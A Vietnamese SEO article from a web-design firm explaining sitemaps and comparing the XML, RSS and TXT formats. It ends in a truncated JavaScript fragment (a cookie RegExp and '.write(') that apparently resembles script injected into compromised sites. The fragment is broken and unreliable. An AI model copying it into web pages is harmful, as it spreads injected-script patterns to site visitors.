Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Kiến thức > SEO > Các giao thức của công cụ tìm kiếm: Sitemap

Các giao thức của công cụ tìm kiếm: Sitemap

Để khuyến khích người quản trị web để tạo ra các trang web và nội dung dễ truy cập, mỗi công cụ tìm kiếm lớn đã xây dựng các dịch vụ hỗ trợ và hướng dẫn. Mỗi dịch vụ cung cấp nhiều mức giá trị cho SEOers, nhưng tất cả đều đáng để tìm hiểu. Những công cụ này cung cấp điểm dữ liệu và cơ hội để trao đổi thông tin với bộ máy tìm kiếm mà không được cung cấp bất kỳ nơi nào khác.

thiết kế web

Các phần dưới đây giải thích các yếu tố tương tác phổ biến mà mỗi công cụ tìm kiếm hỗ trợ và giải thích lý do tại sao chúng lại hữu ích. Hiện có nhiều chi tiết về những yếu tố này để đảm bảo tác dụng của chúng, nhưng do mục đích của bản hướng dẫn này, chỉ có các thành phần quan trọng và giá trị nhất được thảo luận.

Sitemaps là một công cụ cho phép bạn cung cấp cho các gợi ý để các công cụ tìm kiếm có thể thu thập dữ liệu trang web của bạn. Bạn có thể đọc đầy đủ chi tiết về các giao thức tại Sitemaps.org. Ngoài ra, bạn có thể xây dựng sơ đồ trang web của bạn tại  XML-Sitemaps.com. Sơ đồ trang web có ba loại:

  • XML:

Ngôn ngữ đánh dấu mở rộng (Định dạng được khuyến khích)

  • Ưu: Đây là định dạng sitemap được sử dụng rộng rãi nhất. Nó tạo điều kiện dễ dàng cho công cụ tìm kiếm để phân tích và có thể được tạo ra rất nhiều bằng sitemap generator. Ngoài ra, nó cho phép sự kiểm soát hầu hết các thông số trang.
  • Nhược: Files có kích thước tương đối lớn. Do  XML đòi hỏi một thẻ mở và thẻ đóng quanh mỗi phần tử, các kích thước files có thể rất lớn.
  • RSS

Really Simple Syndication or Rich Site Summary

  • Ưu: Dễ dàng duy trì. RSS sitemaps có thể dễ dàng được mã hoá để tự động cập nhật khi nội dung mới được thêm vào.
  • Nhược: Khó quản lý. Mặc dù RSS là một hình thái ngôn ngữ của XML, rất khó để quản lý do thuộc tính tự cập nhật của nó.
  • TXT

Text file

  • Ưu: Rất dễ dàng sử dụng. Các định dạng văn bản sitemap bao gồm từ 1 url/1 dòng cho tới 50.000 dòng
  • Nhược: Không cung cấp khả năng để thêm dữ liệu meta vào các trang web.

Dịch vụ SEOPridio (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘